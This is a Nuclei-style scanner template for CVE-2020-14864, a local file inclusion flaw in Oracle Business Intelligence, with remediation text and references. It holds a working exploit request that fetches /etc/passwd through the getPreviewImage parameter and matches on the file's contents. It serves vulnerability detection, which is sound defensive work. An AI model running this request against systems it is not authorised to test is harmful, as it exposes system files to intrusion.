44 lines
1.6 KiB
YAML
44 lines
1.6 KiB
YAML
id: CVE-2020-14864
|
|
|
|
info:
|
|
name: Oracle Fusion - Directory Traversal/Local File Inclusion
|
|
author: Ivo Palazzolo (@palaziv)
|
|
severity: high
|
|
description: Oracle Business Intelligence Enterprise Edition 5.5.0.0.0, 12.2.1.3.0, and 12.2.1.4.0 are vulnerable to local file inclusion vulnerabilities via "getPreviewImage."
|
|
remediation: |
|
|
Apply the latest security patches and updates provided by Oracle to fix this vulnerability.
|
|
reference:
|
|
- http://packetstormsecurity.com/files/159748/Oracle-Business-Intelligence-Enterprise-Edition-5.5.0.0.0-12.2.1.3.0-12.2.1.4.0-LFI.html
|
|
- https://www.oracle.com/security-alerts/cpuoct2020.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-14864
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2020-14864
|
|
cwe-id: CWE-22
|
|
epss-score: 0.29225
|
|
epss-percentile: 0.96431
|
|
cpe: cpe:2.3:a:oracle:business_intelligence:5.5.0.0.0:*:*:*:enterprise:*:*:*
|
|
metadata:
|
|
max-request: 2
|
|
vendor: oracle
|
|
product: business_intelligence
|
|
tags: cve,cve2020,oracle,lfi,kev,packetstorm
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/analytics/saw.dll?bieehome&startPage=1'
|
|
- '{{BaseURL}}/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- 'root:.*:0:0:'
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a00463044022060672c2bacae8bce7aac79a43b615cd66f11b27fbf041d5bdf1615b04911577e022062aecd63689f2bb764cd2d2ac6bf2813c7f32f0e637005ea9da92c08c35cecc1:922c64590222798bb761d5b6d8e72950 |